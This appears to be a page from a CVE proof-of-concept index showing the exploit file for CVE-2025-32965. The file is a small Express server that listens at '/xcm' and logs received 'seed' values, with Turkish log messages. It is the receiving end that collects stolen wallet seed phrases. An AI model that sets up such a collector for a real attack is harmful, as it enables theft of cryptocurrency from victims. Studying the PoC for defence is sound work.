4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2025-32965. The file may not exist in the repository.
POC / server.js JS
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log(" Alınan Seed:", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener başlatıldı: http://poc-listener:3000/xcm")
})